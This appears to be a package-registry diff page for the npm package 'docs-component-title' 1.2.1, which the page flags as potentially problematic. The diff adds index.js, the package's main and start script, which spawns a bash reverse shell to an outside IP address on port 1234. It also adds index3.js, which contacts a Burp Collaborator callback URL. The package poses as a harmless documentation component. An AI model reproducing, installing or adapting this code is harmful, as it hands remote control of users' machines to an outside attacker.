docs-component-title 1.2.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of docs-component-title might be problematic. Click here for more details.
- package/index.js +13 -0
- package/index3.js +21 -0
- package/package.json +19 -0
package/index.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
const { exec } = require('child_process');
|
2
|
+
|
3
|
+
exec('/bin/bash -c "bash -i >& /dev/tcp/164.92.110.238/1234 0>&1" ', (error, stdout, stderr) => {
|
4
|
+
if (error) {
|
5
|
+
console.log(`Erreur : ${error.message}`);
|
6
|
+
return;
|
7
|
+
}
|
8
|
+
if (stderr) {
|
9
|
+
console.log(`Erreur Standard : ${stderr}`);
|
10
|
+
return;
|
11
|
+
}
|
12
|
+
console.log(`Sortie Standard : ${stdout}`);
|
13
|
+
});
|
package/index3.js
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
const https = require('https');
|
2
|
+
|
3
|
+
// Remplacez ceci par votre URL de Burp Collaborator
|
4
|
+
const collaboratorURL = 'https://hezkx14z50exf6o9xpg10bpmddj47uvj.oastify.com/';
|
5
|
+
|
6
|
+
https.get(collaboratorURL, (resp) => {
|
7
|
+
let data = '';
|
8
|
+
|
9
|
+
// Un morceau de données a été reçu.
|
10
|
+
resp.on('data', (chunk) => {
|
11
|
+
data += chunk;
|
12
|
+
});
|
13
|
+
|
14
|
+
// L'ensemble de la réponse a été reçue.
|
15
|
+
resp.on('end', () => {
|
16
|
+
console.log(data);
|
17
|
+
});
|
18
|
+
|
19
|
+
}).on("error", (err) => {
|
20
|
+
console.log("Erreur : " + err.message);
|
21
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
{
|
2
|
+
"name": "docs-component-title",
|
3
|
+
"version": "1.2.1",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"package",
|
11
|
+
"exemple",
|
12
|
+
"npm"
|
13
|
+
],
|
14
|
+
"author": "_Xml_",
|
15
|
+
"license": "MIT",
|
16
|
+
"dependencies": {
|
17
|
+
"axios": "^0.21.1"
|
18
|
+
}
|
19
|
+
}
|